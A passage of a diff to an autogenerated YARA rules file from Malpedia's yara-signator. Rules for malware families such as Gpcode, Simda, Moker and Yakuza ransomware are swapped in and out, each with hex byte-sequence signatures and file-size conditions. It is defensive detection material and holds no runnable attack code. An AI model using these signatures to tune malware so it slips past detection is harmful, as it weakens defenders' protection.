+		$sequence_4 = { 8d96f8380400 899699d00000 8d9688bf0300 8996acbf0300 898ecdca0000 }
+		$sequence_5 = { 898ea20d0100 8d8ec8780300 898ecce70300 8d9638a10300 8996d70d0100 8d8e44700300 898ebf3f0000 }
+		$sequence_6 = { 8d9698680300 89969cbc0300 8d8624e20300 8986f8b00200 8d8ee5310000 898ee0310000 8d96b0680300 }
+		$sequence_7 = { 55 8bec 50 51 ff15???????? 85c0 7504 }
+		$sequence_8 = { 32db 56 e8???????? 83c404 5f 5e 8ac3 }
+		$sequence_9 = { 898e9c160100 89bec8c20000 8d8e02960300 898ee2c20000 898659c30000 8d8ee15c0300 898e86c30000 }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 1045504
 }
-rule MALPEDIA_Win_Gpcode_Auto : FILE
+rule MALPEDIA_Win_Photolite_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e33e0b1f-76e7-5d87-9046-4de404cd3f75"
+		id = "b838fe06-7cef-5999-9706-bfe3b9dcfde8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gpcode_auto.yar#L1-L198"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photolite"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.photolite_auto.yar#L1-L172"
 		license_url = "N/A"
-		logic_hash = "8f09c23237c11f87162aa59c119a2d6f06242220cf4c97226be012f001eb9b62"
+		logic_hash = "5ed47a87d33839515eff080f5efa80e00a8db9b392140f3655d5bd0ad6753f13"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129148,42 +129519,38 @@ rule MALPEDIA_Win_Gpcode_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff35???????? ff35???????? e8???????? a1???????? a3???????? 6800001000 }
-		$sequence_1 = { c3 ff35???????? e8???????? e8???????? c705????????01000000 c3 55 }
-		$sequence_2 = { 68???????? e8???????? 91 6a00 }
-		$sequence_3 = { a1???????? a3???????? 6800001000 68???????? ff35???????? 6a00 }
-		$sequence_4 = { 68f4010000 e8???????? 833d????????01 75ed e8???????? }
-		$sequence_5 = { 53 a1???????? 6bc008 50 6a40 e8???????? 85c0 }
-		$sequence_6 = { f7f1 8bc8 bb???????? 51 6a41 53 }
-		$sequence_7 = { e8???????? 03df eb0a c705????????00000000 8b0b }
-		$sequence_8 = { 53 8d4508 ff30 e8???????? 8bc8 8d5d08 }
-		$sequence_9 = { ff75fc ff75ec e8???????? ff75f8 e8???????? 8b5dec 6a10 }
-		$sequence_10 = { 83c4ec 6800050000 68???????? 6a00 e8???????? 6a0a 68???????? }
-		$sequence_11 = { 2d???????? 50 8d85e8feffff 50 68???????? e8???????? }
-		$sequence_12 = { 0005???????? 0fb605???????? 8ad3 8d80b8fee014 }
-		$sequence_13 = { 0106 eb94 55 8bec }
-		$sequence_14 = { 0016 40 3bc3 72de }
-		$sequence_15 = { 000c38 40 3b45f8 72e3 }
-		$sequence_16 = { 000e eb08 02c9 b2f9 }
-		$sequence_17 = { 011c07 ebc3 91 668b01 }
-		$sequence_18 = { 001438 eb06 80c107 000c38 }
-		$sequence_19 = { 0144240c 85f6 7fdd 33c0 }
+		$sequence_0 = { b801000000 4883c430 5b c3 4883ec28 }
+		$sequence_1 = { 899504030000 8b85f8020000 8a85f4020000 84c0 751b 488bcb }
+		$sequence_2 = { 72ea 889da0010000 ba36a2b43b c785a40100005dc7c655 }
+		$sequence_3 = { 8a441140 320411 88840ce0000000 48ffc1 4883f920 72e2 }
+		$sequence_4 = { 84c0 751e 488bcb 8b848dd8040000 3566115674 89848dd8040000 4803cf }
+		$sequence_5 = { 0fb7d1 eb07 498d5602 4803d1 498bcc }
+		$sequence_6 = { 889df4020000 babea80905 c785f8020000d5cd7b6b c785fc020000dbc43a37 c7850003000090cc6569 899504030000 }
+		$sequence_7 = { 3510dd9977 89848da0000000 4803cf 493bce 72e5 488d95f0050000 }
+		$sequence_8 = { 83ff03 0f82e8feffff 0f1f840000000000 488b05???????? }
+		$sequence_9 = { 33d2 41b800800000 488bcf ffd0 0fb65310 }
+		$sequence_10 = { 7532 8d5001 33c9 41b8d18a3146 }
+		$sequence_11 = { 488bfa 488bf1 4d85c0 0f8482000000 4c8b15???????? 4d85d2 7516 }
+		$sequence_12 = { 488d8dc0000000 ff15???????? 4c8b05???????? c785e804000000010000 4d85c0 7516 418d5002 }
+		$sequence_13 = { b840000000 488d4c2450 0f1f4000 c60100 488d4901 4883e801 75f3 }
+		$sequence_14 = { 33c9 41b8f572993d e8???????? b988130000 }
+		$sequence_15 = { 4c897da0 448965d8 4c8965d0 e8???????? 3dc8000000 0f849d000000 488b5d28 }
 
 	condition:
-		7 of them and filesize < 761856
+		7 of them and filesize < 99328
 }
-rule MALPEDIA_Win_Flagpro_Auto : FILE
+rule MALPEDIA_Win_Moker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "de33fb8c-8ab6-5256-a88a-80e461ec2d83"
+		id = "ec63b288-3da6-5af3-8f29-c765a5000a5d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flagpro_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moker_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "654c55cf6ed0a2b532ad215de02e3b03b4d1dd22a33c5bbcc5cdd9807575a5d9"
+		logic_hash = "556dd24334d18ecb022efe59f4ae9c093932948c0fb590b7b2557d6f9fb4e7d8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129197,32 +129564,38 @@ rule MALPEDIA_Win_Flagpro_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc3 55 8d2c3f 55 68???????? 8d1409 52 }
-		$sequence_1 = { 89b42494000000 899c2490000000 889c2480000000 39ac24b0000000 7210 8b94249c000000 }
-		$sequence_2 = { 396c2458 720d 8b4c2444 51 e8???????? 83c404 895c2458 }
-		$sequence_3 = { 33d2 c68424984501000f 83bc241c01000010 c744245807000000 c744245400000000 6689542444 }
-		$sequence_4 = { 895c2474 89742470 c644246000 396c2458 720d 8b4c2444 }
-		$sequence_5 = { 803c083d 0f8470010000 3b4b14 7609 }
-		$sequence_6 = { eb02 8bc5 8b6c2424 c6043800 45 83fd03 896c2424 }
-		$sequence_7 = { e9???????? 8b542408 8d8274bafeff 8b8a70bafeff }
-		$sequence_8 = { 8b44241c 8d542434 895c2434 8b08 52 50 8b4148 }
-		$sequence_9 = { 83c404 51 e8???????? 83ec18 }
+		$sequence_0 = { 0302 8945d4 8b4dd4 83c102 }
+		$sequence_1 = { 0302 8945e8 8b4df8 8b55fc }
+		$sequence_2 = { 0100 83c414 85c0 7502 eb0a }
+		$sequence_3 = { 0301 8945e0 e8???????? 8b55e8 }
+		$sequence_4 = { 0302 8945dc 8b45dc 83c002 }
+		$sequence_5 = { 0302 50 e8???????? 83c404 3b450c 750b 8b4df0 }
+		$sequence_6 = { 6a00 6a04 8d9550ffffff 52 }
+		$sequence_7 = { 0302 8945e8 eb09 8b45e8 }
+		$sequence_8 = { 80fa20 720e 80fa7a 7709 feca 80fa1f 7502 }
+		$sequence_9 = { 803aed 0f84cc000000 803af8 7453 803aec 0f848e000000 803ae4 }
+		$sequence_10 = { 6a02 6804000008 68000000c0 ff7508 }
+		$sequence_11 = { 85c0 0f852f020000 6a01 ec }
+		$sequence_12 = { 42 41 ebec 803900 7509 }
+		$sequence_13 = { 740d 83c002 50 ff7508 }
+		$sequence_14 = { ed 2e5c 85c0 740b 40 50 }
+		$sequence_15 = { 83ec0c 51 52 8b450c 85c0 7451 }
 
 	condition:
-		7 of them and filesize < 1411072
+		7 of them and filesize < 1761280
 }
-rule MALPEDIA_Win_Mm_Core_Auto : FILE
+rule MALPEDIA_Win_Explosive_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bf93218a-8d8c-58ea-bf30-76f3ba39addc"
+		id = "7b0d5ce8-6828-5e32-af59-28d083ff4edd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mm_core_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.explosive_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.explosive_rat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "29ec3357b82a9f4eff6706385f45e4b797a4fc7c02bf49f9f64641ab1015abf0"
+		logic_hash = "40a44221da76d27c5ed05de925a337ead09b51104536f440f38ebfb4960fa91d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129236,32 +129609,32 @@ rule MALPEDIA_Win_Mm_Core_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 57 89442430 ffd6 68???????? 57 89442434 }
-		$sequence_1 = { 8b5608 8d0417 3b4604 761d c1e80a 40 c1e00a }
-		$sequence_2 = { 752e 8b45b8 8b483c 894df8 }
-		$sequence_3 = { 0fbe07 83c099 46 83f811 7713 }
-		$sequence_4 = { 51 52 50 68???????? b9ff0f0000 }
-		$sequence_5 = { 6a00 50 e8???????? 83c40c 33c0 33c9 8d542408 }
-		$sequence_6 = { 83c440 8d942460030000 52 68???????? b923010000 e8???????? }
-		$sequence_7 = { 8b442428 8bce e8???????? 56 55 ffd3 }
-		$sequence_8 = { 8b35???????? 33c0 6801040000 89442418 89442414 8944241c }
-		$sequence_9 = { 68???????? e8???????? b8???????? 83c430 8d5002 }
+		$sequence_0 = { 83460402 8b460c 83e0ef 83c801 89460c 668bc3 eb81 }
+		$sequence_1 = { 7606 2bc2 8bf0 eb02 33f6 8b4110 25c0010000 }
+		$sequence_2 = { eb53 83ec1c 8bf4 83ec1c 8bcc 68???????? eb42 }
+		$sequence_3 = { 51 56 8844244b ffd7 8a530e 83c448 6a01 }
+		$sequence_4 = { 730e dc0d???????? 2bfa 03da 3bfa 7ddd 807d1700 }
+		$sequence_5 = { 8d4c2408 894604 c706???????? e8???????? 50 8bce e8???????? }
+		$sequence_6 = { 7202 8b00 2bf0 57 d1fe 56 53 }
+		$sequence_7 = { 7411 397b40 730c 50 e8???????? 83c404 896b3c }
+		$sequence_8 = { 7303 8d4da0 663b01 740c 6aff 6a00 8d4d9c }
+		$sequence_9 = { 52 e8???????? 83c40c 85c0 745d 8bc8 57 }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 855040
 }
-rule MALPEDIA_Win_Unidentified_110_Auto : FILE
+rule MALPEDIA_Win_Backbend_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "de50c299-8c19-5206-82ae-12d89e1364a2"
+		id = "a22a893e-f0d0-5f47-b17e-12aba9db7e5e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_110"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_110_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backbend"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.backbend_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "7703e37b095cb10c8692d1e0e6db116fd89428e35c2b0f841b802fc9c40d7edf"
+		logic_hash = "917ffc9b273790f466925eaea42d05e106cbb5d93ffca6efcba917e5ff6beb38"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129275,32 +129648,32 @@ rule MALPEDIA_Win_Unidentified_110_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8d05f8f80f00 e8???????? 4889c1 488d542460 e8???????? 84c0 0f850a010000 }
-		$sequence_1 = { 7405 b801000000 4883c428 c3 4883ec48 488d0595590d00 4889442430 }
-		$sequence_2 = { eb0d 4c8d055c100f00 4889f1 4c89fa e8???????? 0f0b 4c8d0560100f00 }
-		$sequence_3 = { 48898c2440050000 0fb7842496070000 4889842448050000 48c1e020 4809c8 4889842438050000 8b842498070000 }
-		$sequence_4 = { 8b8424b0020000 898424bc020000 8b8424a0020000 898424ac020000 8b8424a4020000 898424b0020000 8b84248c020000 }
-		$sequence_5 = { 498d7c2401 488b7500 488b4e40 41b601 b800000000 4885c9 759a }
-		$sequence_6 = { 48d3ee 4489f9 e8???????? 21f0 418906 428d043b 894708 }
-		$sequence_7 = { f049834e4001 4883a4242802000000 498d7618 4889f1 e8???????? 4d8b7e10 41f6c701 }
-		$sequence_8 = { 492b442410 48ffcd 4821c5 31ff 4c8d35382d0f00 488b5c2478 4839fd }
-		$sequence_9 = { ba04000000 e8???????? 832000 66c740040200 6644897806 896808 4883600c00 }
+		$sequence_0 = { 8d8500ffffff 50 ff15???????? 85c0 7416 8d8500fbffff }
+		$sequence_1 = { 6800020000 50 e8???????? 8d8500fbffff 53 }
+		$sequence_2 = { 81ec54020000 53 56 57 68???????? c605????????4b c605????????43 }
+		$sequence_3 = { 68e8030000 ffd6 ff7510 ffd3 }
+		$sequence_4 = { ff15???????? 80a40500ffffff00 8d8500ffffff 56 50 ff15???????? }
+		$sequence_5 = { e8???????? 8d8500f9ffff 50 e8???????? }
+		$sequence_6 = { e8???????? 68???????? 56 e8???????? 8d8500fdffff 56 50 }
+		$sequence_7 = { 56 8bf8 ff15???????? 68???????? ff7508 }
+		$sequence_8 = { e8???????? 8d8500f9ffff 56 50 e8???????? }
+		$sequence_9 = { 57 e8???????? 83c410 6860ea0000 ffd6 33c0 }
 
 	condition:
-		7 of them and filesize < 3217408
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Gtpdoor_Auto : FILE
+rule MALPEDIA_Win_Grimagent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4153c400-4ed4-5abe-992b-68d9e6f8d150"
+		id = "382b2b71-faf8-5a36-9cf2-cfc0231fe5c7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gtpdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gtpdoor_auto.yar#L1-L153"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grimagent_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "423cce46146e2125cb44be14d40c52df5a3a2bf5fc0d9812eac79f63ac677cea"
+		logic_hash = "cb883960783c6a0a5fc69c20e118ca0de5603c9daad18851a44812dd938995b0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129314,36 +129687,32 @@ rule MALPEDIA_Win_Gtpdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { fc b932000000 b800000000 f3aa }
-		$sequence_1 = { 0fb600 31d0 8801 8045fb01 8345fc01 }
-		$sequence_2 = { e8???????? 8945c8 837dc8ff 7528 e8???????? 8b38 e8???????? }
-		$sequence_3 = { 8945f4 8d950afaffff b8dc050000 89442408 c744240400000000 891424 e8???????? }
-		$sequence_4 = { fc 488bbda0f1ffff f2ae 4889c8 48f7d0 }
-		$sequence_5 = { 55 48833d????????00 4889e5 7416 b800000000 4885c0 740c }
-		$sequence_6 = { a3???????? a1???????? c744240800000000 c744240400000000 890424 }
-		$sequence_7 = { 0fb64009 3c01 757b 8b45e8 83c00c }
-		$sequence_8 = { f7d0 8d50ff 8b45e8 83c00c bf???????? }
-		$sequence_9 = { c9 c3 55 4889e5 48897de8 488955d8 4c8945c8 }
-		$sequence_10 = { 8b7dd4 f2ae 89c8 f7d0 83e801 83c001 }
-		$sequence_11 = { 8b450c 8945ea c645ee00 0fb68504faffff }
-		$sequence_12 = { 4c89c9 e8???????? 8945fc 8b75fc bf???????? b800000000 }
-		$sequence_13 = { 4889c2 480355e0 0fb645ff 8802 }
+		$sequence_0 = { 83ec0c 8b450c 8945f8 c745fc00220400 8b4dfc 51 }
+		$sequence_1 = { 8b550c 8955fc 8b450c 50 e8???????? 83c404 3945f8 }
+		$sequence_2 = { 0f8394000000 8b4df0 0fb711 8b45fc }
+		$sequence_3 = { e8???????? 83c404 3945f8 750e c745e801000000 b801000000 eb1a }
+		$sequence_4 = { 7328 8b55ec 0fb702 8b4dfc 0fb711 3bc2 7514 }
+		$sequence_5 = { c745f801000000 ebcc 8b45fc 50 ff15???????? }
+		$sequence_6 = { 85c0 7507 c745f801000000 ebcc 8b45fc 50 }
+		$sequence_7 = { 8b450c 50 e8???????? 83c404 3945f8 750e }
+		$sequence_8 = { 50 e8???????? 85c0 7420 8b4d08 51 8d95f4feffff }
+		$sequence_9 = { 8b4d0c 83c101 894d0c ebd0 }
 
 	condition:
-		7 of them and filesize < 4210688
+		7 of them and filesize < 582656
 }
-rule MALPEDIA_Win_Yakuza_Ransomware_Auto : FILE
+rule MALPEDIA_Win_Simda_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "73df97f0-7e35-550b-9535-694c3981ecc9"
+		id = "d74b8ce3-47a5-51db-a32e-c17b32ae8c86"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yakuza_ransomware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yakuza_ransomware_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.simda_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "877a27b3e7b369865a3e2e4c6ef5b4324a9318b7d81e28cbd514c89eb464d3c0"
+		logic_hash = "843d6d6caa38939c108c027a85a80f4565ce68a6213223a9ac5f7b9c75de56e2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129357,32 +129726,32 @@ rule MALPEDIA_Win_Yakuza_Ransomware_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 894da4 3bc8 0f8e1f010000 68e8030000 ffd2 47 897da0 }
-		$sequence_1 = { 8bce e8???????? 85c0 0f84e6000000 83f802 0f8417010000 f7464000080000 }
-		$sequence_2 = { 744d 6afd 8d4da8 e8???????? 8b4508 8bcf 83c00c }
-		$sequence_3 = { eb41 8bc2 bafeffff7f 83c807 3dfeffff7f 0f47c2 8945a0 }
-		$sequence_4 = { 8b01 0f84d6000000 57 ff5044 50 8d4ddc e8???????? }
-		$sequence_5 = { e8???????? 8907 894704 897df0 8d04f0 894708 c745fc00000000 }
-		$sequence_6 = { 6a02 8bce e8???????? 8bf0 6a00 8b8dd4f1ffff e8???????? }
-		$sequence_7 = { e9???????? 83e92c e9???????? 2b49fc 81e910010000 e9???????? 2b49fc }
-		$sequence_8 = { c3 8b4de8 e9???????? 8b4de8 e9???????? 8d4de8 e9???????? }
-		$sequence_9 = { f00fc14120 7523 8bb55cffffff 0f1f4000 85f6 7415 8bce }
+		$sequence_0 = { 83f906 7519 8b85e8feffff 85c0 }
+		$sequence_1 = { 0faffe 8bd0 0faf55fc 8bd9 8bf7 c1e610 c1e110 }
+		$sequence_2 = { 8b85e8feffff 85c0 7505 8d41ff eb0f 83f801 }
+		$sequence_3 = { 56 ff15???????? 8b4d08 6a00 8d45fc }
+		$sequence_4 = { 8b7510 57 e8???????? 57 8bf3 e8???????? }
+		$sequence_5 = { 7601 48 8bd1 c1ea10 }
+		$sequence_6 = { 3bd0 7301 41 8b4508 0faff3 03f1 }
+		$sequence_7 = { 33d2 bb06000000 f7f3 8a5415f0 }
+		$sequence_8 = { 8b38 f7d9 3b3c18 7301 41 }
+		$sequence_9 = { 85c0 75dd 8b4d0c 8bc3 2bc2 }
 
 	condition:
-		7 of them and filesize < 2811904
+		7 of them and filesize < 1581056
 }
-rule MALPEDIA_Win_Thanatos_Ransom_Auto : FILE
+rule MALPEDIA_Win_Krdownloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ab4a7e75-8b1e-5a05-9767-529b8f947adc"
+		id = "10ef2ce3-6275-5734-8773-8e4b907d8dbf"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.thanatos_ransom_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.krdownloader_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "92f92876fe7a3f7974d946f7e2104d595ba94070884727a043f8a6a9bbc163b3"
+		logic_hash = "5c0e3ed0b3f2de4235868995565358a807a3f9a7ed056ed4108e22469b818ef9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129396,32 +129765,32 @@ rule MALPEDIA_Win_Thanatos_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b0485e0774300 894df0 8a440129 8b4d08 8845ff }
-		$sequence_1 = { e8???????? 3bf0 7419 4e }
-		$sequence_2 = { e8???????? 83c404 c645fc0e 83781410 7202 8b00 }
-		$sequence_3 = { c644012801 8b0495e0774300 897c0118 8bfe e9???????? }
-		$sequence_4 = { e8???????? c645fc04 8b45d4 83f810 7242 8b4dc0 }
-		$sequence_5 = { e9???????? 8d8db8feffff e9???????? 8d8d70feffff e9???????? 8d8d88feffff }
-		$sequence_6 = { ff15???????? 8b859cfeffff 83f810 7245 8b8d88feffff }
-		$sequence_7 = { 6a04 58 6bc000 8b4d08 898814714300 }
-		$sequence_8 = { ff758c e8???????? 33c0 c745a007000000 c7459c00000000 6689458c 39856cffffff }
-		$sequence_9 = { 6af6 ff15???????? 8b04bde0774300 834c0318ff 33c0 }
+		$sequence_0 = { c645e161 c645e22e c645e370 c645e468 c645e570 c645e63f c645e76d }
+		$sequence_1 = { 8b4dbc 894db4 8b55b8 81c200010000 52 }
+		$sequence_2 = { e8???????? 8945f0 8b45f8 8b4df0 3b4808 7708 }
+		$sequence_3 = { 8b55ec 52 68???????? 68???????? e8???????? }
+		$sequence_4 = { 52 e8???????? 83c40c 85c0 752c 837d0c00 741d }
+		$sequence_5 = { 8b4510 50 e8???????? 83c40c eb23 8b4d14 c70150000000 }
+		$sequence_6 = { 50 ff15???????? 6aff ff15???????? 6a3c e8???????? 83c404 }
+		$sequence_7 = { 894dc0 8b55c0 8955ac 8b45fc }
+		$sequence_8 = { 8b4df8 894df4 8b55f4 83c210 }
+		$sequence_9 = { 51 6a00 8b4d10 e8???????? 894590 8b5590 89558c }
 
 	condition:
-		7 of them and filesize < 516096
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Poortry_Auto : FILE
+rule MALPEDIA_Win_Unidentified_044_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a1a56f3e-7edd-5f6c-95ad-6a7e0151c6bc"
+		id = "b06c2db5-4f74-514b-a6ac-3ca802bc63db"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poortry"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.poortry_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_044_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "061aa3c00188d534d84cadb6424381cd58cb3c5879a428a6e59fbe1a6fec0983"
+		logic_hash = "bba754b0708d8dcd8392b060bb16bcb2ec72e2dcb75dae26c5459c6dda294679"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129435,32 +129804,32 @@ rule MALPEDIA_Win_Poortry_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 d3d5 660fbae555 0fbafd34 310424 40fecd 40c0cd6d }
-		$sequence_1 = { 48f7d0 98 80c207 c6c434 6698 0f95c0 d0ca }
-		$sequence_2 = { f6c3d5 81f2e415f772 664181f9192e 443aec 4184f8 4152 311424 }
-		$sequence_3 = { 4032f3 4150 6699 87d2 d2fe 55 40c0f59a }
-		$sequence_4 = { f9 4180fc33 56 313c24 402af1 5e }
-		$sequence_5 = { f5 f7c7ed4a0055 80fcbc 81f30340226b 4180fef8 f8 81c3793acb71 }
-		$sequence_6 = { f5 4181f0a6605c4b 41d1c0 57 4080f71e 4584ee 44310424 }
-		$sequence_7 = { 6698 fec4 4881f2933d9011 4898 490fbfc4 98 48ffc2 }
-		$sequence_8 = { 55 f8 4863e8 4c0fa3cd 310c24 6681dd6e1b }
-		$sequence_9 = { d2ef 660fbae309 453ad5 5b f6c68b 4180fa75 f5 }
+		$sequence_0 = { 85c0 0f858afeffff e8???????? 5f 5e }
+		$sequence_1 = { 53 32db 381d???????? 761f 56 8b35???????? 0fb6c3 }
+		$sequence_2 = { 83f8ff 755f ff15???????? 3d1e270000 7552 }
+		$sequence_3 = { 893b 83ffff 7456 3935???????? 0f95c0 0fb6c8 }
+		$sequence_4 = { 8bff 0fb74c7468 0fb717 0fafc8 8be9 81e5ffff0000 2bd5 }
+		$sequence_5 = { 55 56 8bf0 803e00 8be8 }
+		$sequence_6 = { 8d4c245c 51 6a00 c744246401000000 89742468 ffd5 85c0 }
+		$sequence_7 = { c7460403000000 ffd3 5b 5f }
+		$sequence_8 = { 8d4c242c 51 e8???????? 8bbc24ec000000 668b4706 be10000000 2bf2 }
+		$sequence_9 = { 7505 b8???????? e8???????? a1???????? 56 }
 
 	condition:
-		7 of them and filesize < 8078336
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Bredolab_Auto : FILE
+rule MALPEDIA_Win_Graphical_Neutrino_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c6a2080f-c1fa-51ce-a641-734a6742f158"
+		id = "709b8c7e-3b27-57db-a7ca-ec92842eb964"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bredolab_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphical_neutrino"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.graphical_neutrino_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "2bd111cf3554a8f40745e475f3dd7434ed1da715b8da17d69e83265e9fb05367"
+		logic_hash = "20fe129c0f852597f7609ecc786913a363ba634ff126dc42ff1c434f04b54173"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129474,32 +129843,32 @@ rule MALPEDIA_Win_Bredolab_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 84c9 0f849f000000 83fe01 0f8426010000 }
-		$sequence_1 = { 891c24 e8???????? 89c6 ebbf 55 89e5 57 }
-		$sequence_2 = { f3a4 c64415d800 8b550c 89542404 890424 }
-		$sequence_3 = { e9???????? 89f3 c7864c09000000000000 40 7496 }
-		$sequence_4 = { ff15???????? 57 57 8b45e4 }
-		$sequence_5 = { 8a4d10 d3e3 899d60ffffff 8b4510 8a4d0c d3e0 03450c }
-		$sequence_6 = { 0f84f0feffff c744240802000000 8b8d70ffffff 894c2404 8b9574ffffff }
-		$sequence_7 = { 8b5514 891424 ff15???????? 83ec1c 89c2 83f8ff }
-		$sequence_8 = { e8???????? 84c0 7409 8b45f4 83c434 5b }
